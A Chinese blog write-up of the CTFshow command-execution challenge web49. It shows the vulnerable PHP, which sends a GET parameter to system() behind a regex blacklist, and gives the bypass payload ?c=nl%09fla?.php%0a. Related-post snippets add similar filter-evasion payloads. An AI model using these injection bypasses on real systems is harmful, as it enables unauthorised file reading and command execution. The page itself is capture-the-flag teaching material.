CTFshow 命令执行 web49

最新推荐文章于 2023-09-06 19:35:51 发布
最新推荐文章于 2023-09-06 19:35:51 发布
阅读量129 收藏 2
点赞数
分类专栏: CTFshow 文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121437144
版权

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

知识点

发现nl依然没有被过滤

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看 
file -f:报错出具体内容 
grep:在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

题解

?c=nl%09fla?.php%0a

总结

水题

Kradress
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-misc49
m0_67507776的博客
04-15 1254
1.直接打开或用010Editor打开文本文件“真真假假_假假真真.txt”,发现头部zip文件标识,重命名解压缩 2.打开发现只有一个线索hint.txt可用,打开发现字符串 VZYQVTVZVTVZTTBZVZYCVTVZTTBZTTBZTTBZTTBZVTVZTTBZTTBZTTBZVZYCVZYQVTVZVZYQVTVZTTCAVZYQVTVZVTVZTTBZTTBZVZYQVTVZVZYQVTVZVZYSVZYQVTVZVZYQVTVZTTCAVTVZTTBZTTBZTTBZTT..
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow 命令执行 web47
Kradress的博客
11-20 176
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:59:23 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web47,48(命令执行)
m0_62094846的博客
01-26 131
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:59:23 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c']; .
ctfshow-web49(命令执行)
m0_62094846的博客
01-26 175
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:22:43 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
CTFshow web48 49 50 51 52
ChenD的学习笔记
11-10 897
CTFshow web48 web49 web50 web51 web52
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow学习记录-web入门(命令执行49-58)
龟速更新的九某人
06-07 903
ctfshow学习记录-web入门(命令执行web49-58)
ctfshow-命令执行-web36
weixin_43400535的博客
11-03 2891
ctfshow-web36 提示:ctfshow靶场命令执行wp 文章目录ctfshow-web36题目描述:原理:审计:方法 :思路:尝试使用web35的方法,将变量1换成a代替,绕过数字的过滤-----使用字母代替数字的索引。Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @La
刷题之旅第20站,CTFshow misc49
cc菜的一批
02-15 1361
感谢ctf show平台提供题目 下载文件打开后,发现熟悉的文件结构,一看就是zip文件。 修改后缀名为zip,解压看到hint.txt 发现字母变化范围不大,且尾部有== 字母解密得到: 音符解密: 花朵解密: 得到压缩包密码:key{welcome_to_ctf} 解压后是俩张一样的图片 使用盲水印工具,解密,得到flag。 原创文章不易,点个赞再走吧。 ...
Ctfshow web入门-命令执行web47-50 WP
qq_45427131的博客
05-20 391
查看源码发现又是熟悉的黑洞,这题过滤了的参数都可以用以下几个代替 tac 代替 cat < 代替 空格 ‘’分隔 代替 * 能代替的新命令 被过滤的命令 tac cat < 空格 “” * 注意:<不能和?连在一起用 构造payload: ?c=tac<fla''g.php%26%26ls web48 按照上一题的逻辑,查看有没有我们需要用到的参数被过滤了… 仔细分析下来之后发现没有参数被过滤,这个时候就可以复制上一题的payload到本题执行.
命令执行(2)ctfshow_web入门命令执行web39-49
weixin_47726676的博客
04-25 318
web39 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c.".php"); } }else{ highlight_file(__FILE__); } 没有回响,并且加了php的后缀,38的解法还是可以使用 ?c=data://text/plain,<?=system("tac
ctfshow web入门命令执行web49-web53
m0_62207170的博客
03-31 256
ctfshow web入门命令执行web49-web53
《CTFshow-Web入门》05. Web 41~50
学习学习学习......
04-10 1381
eval() 利用与正则绕过,或运算【|】构造可用字符、system() 利用与正则绕过,{>/dev/null 2>&1} 绕过。
ctfshow web49
最新发布
m0_69289738的博客
09-06 97
c=tac<fla''g.php||ls或?c=nl<fla''g.php||ls都可以得到flag。这题过滤了x09和x26,不能再用之前的方法了。不能再使用水平制表符符了,现在是有nl。这题过滤了x09和x26。||的编码是%7C%7C。查看源代码得flag。
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1810
CTFSHOW WEB入门 命令执行 web29-48
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值